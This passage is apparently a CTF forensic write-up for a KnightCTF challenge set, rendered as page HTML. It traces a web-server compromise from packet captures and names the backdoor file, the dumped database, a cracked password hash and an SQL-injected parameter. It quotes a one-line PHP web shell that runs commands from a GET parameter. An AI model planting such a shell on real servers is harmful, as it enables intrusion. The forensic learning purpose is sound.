src=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/af590/image-20240122142146880.png\"\n            alt=\"image-20240122142146880\"\n            title=\"image-20240122142146880\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Extracting that file reveals a Doc file with an embedded image like the one below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 639px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/738b8/image-20240122142402072.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 132.08333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAIAAAA44esqAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEaElEQVQ4y2P4DwZ///79/fvP37///vz5++cPnAFCQPbvP3+A6O+/f/+RwI8fPxj+///9/9/vb18///z57cuXj58/f/j86f2/v3/+Y4B///78+/f796+fP75/+fXz2+dPHxn+/37y79fjn18fnjm+7f//d//+vfn//82Lh+c2rZo3pa919ozeE8d2rNm4cPKSibfun/n//+OzJxfOndxy9dyOKxf3M/z/9fjvj4f//79eMKsnJD6wb/XECUv6I7LinWL89dxspNUU5My1xPWUGJgZErJjL1zZe+va3jMn1p05vubSuZ1gzT+Bml89enBRVkuJQUZY0cu0V1N0iix/jIKwrLIMt4gAOw83j7CApoZiVW/FjBkd3b3Vx4+svHJ+N0jzv5+P//999vLJ+bjYEAEDZXNj1c1CHPuF2DZryUWoSYiYaGhrKCpoKGqoKyTGhQPVXzm35eKZjRfPg2x+8uc70OY3EyY0JcaGispKajnolUnypQjyJUcFWSjKhdiZ2Okq2wW6iClLM3Gx2jlaLVs68cjh5RfP7mD4//PJ/z+Pv3++VV6aMXN6m7qqMgMjg7oEl5GIYFNdka2OWp6zVbibvZeXk62TlbiEiIi4SFCYD9Dbl4F+/vfrwf+/j96/uTpnRuvVC7uyMxMykqNrWsujU8KtXKwCXSwXLeivqy5szEl8eHHvggW9hw+uu3/z6KVzmy6cA9r858mPL7fu3jy8YMWUa9f279m+7Pvnu0d2L89KCC7IiI6J8DXWUnGyMZ7YV71l25JZ09punNnx8eNNkJ9Bof336blT2yf1N3R2VM+c3tlQV5KTmeDiYje9pvBadYGjnYUoJ6u5h838ZZNWrprZXFPY2VAysa/+3HGws///efT8yTk/HzdTU72YyMCmmjxnW9PultLEuFBzM2NJHnZBfg4dOcm29NCMWH97RyslNeW66rxbV3ZeOL0NqPnZq+cXktOjXQJcPJysYn1d7ezNHB0tba3NpKQkTHTURDnZLKUlPP1cUoM9g7ycnT0dG1pKLpzacAkU2n+evnp2sboyR1VdKT4+vKezdvHCyV2ddR2tNVMmtZaVZPByc8UnRSYmhPf21AO9Y2qsO6Gn+tyJ9ZfPgvz87NWzC7u2L01OiIiODIyJCU5LiynIS21trqytzndxtWVhYfH2clRXV3Z2tnF0sKoqy1qxZMLpY2tgKezPc2CWuHZx38pl0w7sWdPRVmNjbS4nJ2NgqKOmpiwtLeXoYL100eStGxdsWjfv8rlt1y9tP3d6HTiR/H7+79ezvz+f/v/3FpjO/oHIr6+eX9u0cVF2ZnJZad6mDYtfP78KzE///r3+///96xeXL57fcfXy7utXDgHz818IAhYHwGwMJP/++Q3MvGiZGVgc/AXL/vnzC4iAar59/cLwHxv4B8r1wBLlD5AElTD//mGqgZQkZIJBpfkfNu/h0/wPDIi3E6IYofkHGHz//v3nz58ENQNjFcXZv379AmoD8oEM4p0NAAvZbQbwMYKwAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/8ac56/image-20240122142402072.webp 240w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/d3be9/image-20240122142402072.webp 480w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/d95e5/image-20240122142402072.webp 639w\"\n              sizes=\"(max-width: 639px) 100vw, 639px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/8ff5a/image-20240122142402072.png 240w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/e85cb/image-20240122142402072.png 480w,\n/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/738b8/image-20240122142402072.png 639w\"\n            sizes=\"(max-width: 639px) 100vw, 639px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e2d08df26afabaa66c4bc8aa7b2b4bbe/738b8/image-20240122142402072.png\"\n            alt=\"image-20240122142402072\"\n            title=\"image-20240122142402072\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I couldn’t find anything even after extracting the image file, so I tried unzipping the Doc file and was able to find a file containing the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 715px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f24f3d44d13e974bcd420f34b1880ff4/d0c0e/image-20240122142752179.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAn0lEQVQI13WNTQ4CIQyFOYYzFAK0DDDQAX+i0bhw4977n0ZwNRu/NK+vfUkrztf75fbgdgZQ03SY/jP/ao+oXGqOdeMYo9Ia1EAr0KODAqmgn+1OSalmCXsEIgVukY+cQk0LB0/kMWT0ieIat1PKhQNF8p8Xvp/rmjfm0lrjwsIYY5EsIlpLznY1Y+VMN86NyI3IWZMWExbn+tgfEnX9As/fIF+U0RmUAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f24f3d44d13e974bcd420f34b1880ff4/8ac56/image-20240122142752179.webp 240w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/d3be9/image-20240122142752179.webp 480w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/cb533/image-20240122142752179.webp 715w\"\n              sizes=\"(max-width: 715px) 100vw, 715px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f24f3d44d13e974bcd420f34b1880ff4/8ff5a/image-20240122142752179.png 240w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/e85cb/image-20240122142752179.png 480w,\n/static/f24f3d44d13e974bcd420f34b1880ff4/d0c0e/image-20240122142752179.png 715w\"\n            sizes=\"(max-width: 715px) 100vw, 715px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f24f3d44d13e974bcd420f34b1880ff4/d0c0e/image-20240122142752179.png\"\n            alt=\"image-20240122142752179\"\n            title=\"image-20240122142752179\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"backdoorforensic\" style=\"position:relative;\"><a href=\"#backdoorforensic\" aria-label=\"backdoorforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>BackDoor(Forensic)</h3>\n<blockquote>\n<p>What is the backdoor file name?</p>\n</blockquote>\n<p>Tracing the sequence of reverse-shell packets shows that a PHP file containing <code class=\"language-text\">&lt;?php echo system(\"$_GET['cmd']\");?></code> was created as <code class=\"language-text\">.621b4CkD0oR.php5</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/efaba067be42fca5e50c60288ce458fe/dcccd/image-20240122143741729.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAABfklEQVQY02PYseP85s2n+/vnt7VN6++bV1/Xk5lZkpNTnp5emJ5elJZWkJFRkhiX7OXm6unq6uni4uXq6u3u7u3m5uLgwLBmzaHU1Pzw8NjQ0Njw8LiIiITQ0LjwiPj4+Awgio1Nj4vLTIxNMjc1UVVX19TU1IAhTS0thhMnHu7ZfXbdusPbt588dOj8rl1nJ05a6Onpp6Ghrq6uBkPqurq6+np6yAgIGA4fvn3y5KM9e67OnbNh0cJNs2evmz1709SpK4qK6oqK6gsL6gqLGiqKKrISE+LDwuysrbW0tYHadMGA4cCBG5MnL+zqmtHRPrWvd3pP98ycnFJXVw83Ny8XFw8XF3cg6ebqbmRooK2trYsKGE6cfHTx4sudO88fOHDlxIkb+/dfWbP2SFVVJ1gbMIA8nF083F3d/b08TYyMQDbCrAVpPnToPhBt23Zm/drj9fW9xcX1pSXNNbXdDQ19QG5dbU9Dw4T6yoaCpKTEyMio0GAjB3MdHR2IZgANhqotxL1vuAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/efaba067be42fca5e50c60288ce458fe/8ac56/image-20240122143741729.webp 240w,\n/static/efaba067be42fca5e50c60288ce458fe/d3be9/image-20240122143741729.webp 480w,\n/static/efaba067be42fca5e50c60288ce458fe/e46b2/image-20240122143741729.webp 960w,\n/static/efaba067be42fca5e50c60288ce458fe/0b154/image-20240122143741729.webp 1127w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/efaba067be42fca5e50c60288ce458fe/8ff5a/image-20240122143741729.png 240w,\n/static/efaba067be42fca5e50c60288ce458fe/e85cb/image-20240122143741729.png 480w,\n/static/efaba067be42fca5e50c60288ce458fe/d9199/image-20240122143741729.png 960w,\n/static/efaba067be42fca5e50c60288ce458fe/dcccd/image-20240122143741729.png 1127w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/efaba067be42fca5e50c60288ce458fe/d9199/image-20240122143741729.png\"\n            alt=\"image-20240122143741729\"\n            title=\"image-20240122143741729\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From that, we can determine that the correct flag is <code class=\"language-text\">KCTF{.621b4CkD0oR.php5}</code>.</p>\n<h3 id=\"backdoor-pathforensic\" style=\"position:relative;\"><a href=\"#backdoor-pathforensic\" aria-label=\"backdoor pathforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>BackDoor Path(Forensic)</h3>\n<blockquote>\n<p>What is the full path of the backdoor in the server?</p>\n</blockquote>\n<p>Here, the path of the backdoor file we confirmed earlier is itself the flag.</p>\n<p><code class=\"language-text\">KCTF{/var/www/html/app/assets/.621b4CkD0oR.php5}</code> is the correct flag.</p>\n<h3 id=\"super-adminforensic\" style=\"position:relative;\"><a href=\"#super-adminforensic\" aria-label=\"super adminforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Super Admin(Forensic)</h3>\n<blockquote>\n<p>What is the super admin password in the web application?</p>\n</blockquote>\n<p>Reading the reverse-shell traffic trace shows that a database dump file created with the command <code class=\"language-text\">mysqldump -u db_user -p kctf2021 > backup.sql</code> was stolen.</p>\n<p>Apparently this seems to match the dump file provided as an attachment.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/186a1987df6444e9108b783f6becfdda/58354/image-20240122151507889.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfUlEQVQY05XPsRLCIBBFUf7/KzUGJhOQXSUwsDujPrawsYmnonlccDnnaJiZiEo56jHVWksprTURGWOoyOuH27bNe4/xvscQwt0wPyClhAux7L0P8z3gRhV1ZOWZZUbt/Q9HlBG8TNdlua2rjymicGr8tOcB+vhzM6p6ZvwBPw8hXsjs4osAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/186a1987df6444e9108b783f6becfdda/8ac56/image-20240122151507889.webp 240w,\n/static/186a1987df6444e9108b783f6becfdda/d3be9/image-20240122151507889.webp 480w,\n/static/186a1987df6444e9108b783f6becfdda/e46b2/image-20240122151507889.webp 960w,\n/static/186a1987df6444e9108b783f6becfdda/29105/image-20240122151507889.webp 1396w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/186a1987df6444e9108b783f6becfdda/8ff5a/image-20240122151507889.png 240w,\n/static/186a1987df6444e9108b783f6becfdda/e85cb/image-20240122151507889.png 480w,\n/static/186a1987df6444e9108b783f6becfdda/d9199/image-20240122151507889.png 960w,\n/static/186a1987df6444e9108b783f6becfdda/58354/image-20240122151507889.png 1396w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/186a1987df6444e9108b783f6becfdda/d9199/image-20240122151507889.png\"\n            alt=\"image-20240122151507889\"\n            title=\"image-20240122151507889\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Using a convenient online tool to analyze the hash <code class=\"language-text\">5f27f7648285dec7954f5ee1ad696841</code> reveals that the password is <code class=\"language-text\">letmeinroot</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/acd79/image-20240122151613025.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAaElEQVQI12MQq1onWbNeuHKdQAUQrRWEIYHyNUhotSAMCYDQKhCqWM3Qvml3x+Y9bZt2t2zZ27Zlb/uWPUDUthkLat+8uw2BdrVv2c1w/9nNh89uPXx2+8mr+89ePSAO3X/68t7L148AtY103G9sNd0AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/8ac56/image-20240122151613025.webp 240w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/d3be9/image-20240122151613025.webp 480w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/e46b2/image-20240122151613025.webp 960w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/f992d/image-20240122151613025.webp 1440w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/bb338/image-20240122151613025.webp 1543w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/8ff5a/image-20240122151613025.png 240w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/e85cb/image-20240122151613025.png 480w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/d9199/image-20240122151613025.png 960w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/07a9c/image-20240122151613025.png 1440w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/acd79/image-20240122151613025.png 1543w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/d9199/image-20240122151613025.png\"\n            alt=\"image-20240122151613025\"\n            title=\"image-20240122151613025\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The correct flag was <code class=\"language-text\">KCTF{letmeinroot}</code>.</p>\n<h3 id=\"admin-flagforensic\" style=\"position:relative;\"><a href=\"#admin-flagforensic\" aria-label=\"admin flagforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Admin Flag(Forensic)</h3>\n<blockquote>\n<p>Can you find the Admin Flag of the web server.?</p>\n</blockquote>\n<p>Looking at the HTTP objects, we can see that a file called <code class=\"language-text\">app_bak.zip</code> was stolen.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 545px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9c03071567e825e821f760d52423477b/3ddad/image-20240122151816621.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAj0lEQVQI103LsQ6DIBSFYV/HS5kMBLiIDJJSaEodcAFr0vb9n6FEl37jn3M6zjlqPRqjEBlj/KC1Nqa1kf9jTEiJiMMwtME0TV1bpPR8f745Z0R1ynndX/u2beHmhRBnlFK2Qyn1kdKyLLWWjhBQCmMI1lpKLwCk8VcfQvDejwp76MkBACilzrl7jG6eY4w/ssIsI3Nw+WwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9c03071567e825e821f760d52423477b/8ac56/image-20240122151816621.webp 240w,\n/static/9c03071567e825e821f760d52423477b/d3be9/image-20240122151816621.webp 480w,\n/static/9c03071567e825e821f760d52423477b/6305f/image-20240122151816621.webp 545w\"\n              sizes=\"(max-width: 545px) 100vw, 545px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9c03071567e825e821f760d52423477b/8ff5a/image-20240122151816621.png 240w,\n/static/9c03071567e825e821f760d52423477b/e85cb/image-20240122151816621.png 480w,\n/static/9c03071567e825e821f760d52423477b/3ddad/image-20240122151816621.png 545w\"\n            sizes=\"(max-width: 545px) 100vw, 545px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9c03071567e825e821f760d52423477b/3ddad/image-20240122151816621.png\"\n            alt=\"image-20240122151816621\"\n            title=\"image-20240122151816621\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After extracting it, we can find code that checks whether the user has the root role.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 639px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/92b6a6e45153ae6a6b02dd954894e93f/738b8/image-20240122152026973.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiUlEQVQI13WO2wqDMBBE/ZDqZm/ZZDG1gqAPgb71/z+pqbalCIV5GBgOczqNFkIg4jzO2U3NZbyxRiUmIoC+H4bfXD4FADozR2w4lpxrrev9sWx1ncpcrtvki3sWTcKu0nKUrGxCL/j9jNiuVFkZjULbTDgdUT7B/oWjpQYLk8Y0AO5KcFL9p/0EjrMhoKp4jN4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/92b6a6e45153ae6a6b02dd954894e93f/8ac56/image-20240122152026973.webp 240w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/d3be9/image-20240122152026973.webp 480w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/d95e5/image-20240122152026973.webp 639w\"\n              sizes=\"(max-width: 639px) 100vw, 639px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/92b6a6e45153ae6a6b02dd954894e93f/8ff5a/image-20240122152026973.png 240w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/e85cb/image-20240122152026973.png 480w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/738b8/image-20240122152026973.png 639w\"\n            sizes=\"(max-width: 639px) 100vw, 639px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/92b6a6e45153ae6a6b02dd954894e93f/738b8/image-20240122152026973.png\"\n            alt=\"image-20240122152026973\"\n            title=\"image-20240122152026973\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>That did not work as a flag directly, so I ran it through CyberChef Magic and identified it as a Base85-encoded flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d2e8dcf9cde152f957c0916021375da5/18539/image-20240122152127751.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+0lEQVQY03VQgUrDMBDN/3+NiKIMUatMwYkggm6IybYmzsLSLItJmiZNvLCtG6KPy3E5uHvvHcLsnfLZUi2k5VP2McGv7IsKIYzR3xnKWO1a92egh3nxUo3elk9388ENOb3ER1Tgzie3QdN479M/QOPquZSYrvH99KIgJ9fkmArS+RhCiLHbIBwAdvU1GmIgPLsl50MyeGTFaHGFq8mKi0xqrXO9gm3Rtm3fRISPmZiVNSlrDJlKUsnPWprVGgzrbgelFOccWjDjs6isClmvm2D2Ad+2cSH5LsW4twfURhut8xWttTCZPaf4+wzgMeVuPARY9aA4P9i9Jf8BJI6NreGKVR4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d2e8dcf9cde152f957c0916021375da5/8ac56/image-20240122152127751.webp 240w,\n/static/d2e8dcf9cde152f957c0916021375da5/d3be9/image-20240122152127751.webp 480w,\n/static/d2e8dcf9cde152f957c0916021375da5/e46b2/image-20240122152127751.webp 960w,\n/static/d2e8dcf9cde152f957c0916021375da5/2b317/image-20240122152127751.webp 1074w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d2e8dcf9cde152f957c0916021375da5/8ff5a/image-20240122152127751.png 240w,\n/static/d2e8dcf9cde152f957c0916021375da5/e85cb/image-20240122152127751.png 480w,\n/static/d2e8dcf9cde152f957c0916021375da5/d9199/image-20240122152127751.png 960w,\n/static/d2e8dcf9cde152f957c0916021375da5/18539/image-20240122152127751.png 1074w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d2e8dcf9cde152f957c0916021375da5/d9199/image-20240122152127751.png\"\n            alt=\"image-20240122152127751\"\n            title=\"image-20240122152127751\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The correct flag was <code class=\"language-text\">KCTF{y0U_G0t_tHe_AdMin_Fl4g}</code>.</p>\n<h3 id=\"vulnforensic\" style=\"position:relative;\"><a href=\"#vulnforensic\" aria-label=\"vulnforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Vuln(Forensic)</h3>\n<blockquote>\n<p>What was the vulnerability on the edit task page &#x26; what parameter was vulnerable?</p>\n</blockquote>\n<p>Looking at the packets, we can see repeated attacks against <code class=\"language-text\">process_edit_task.php</code> that appear to be SQL injection.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    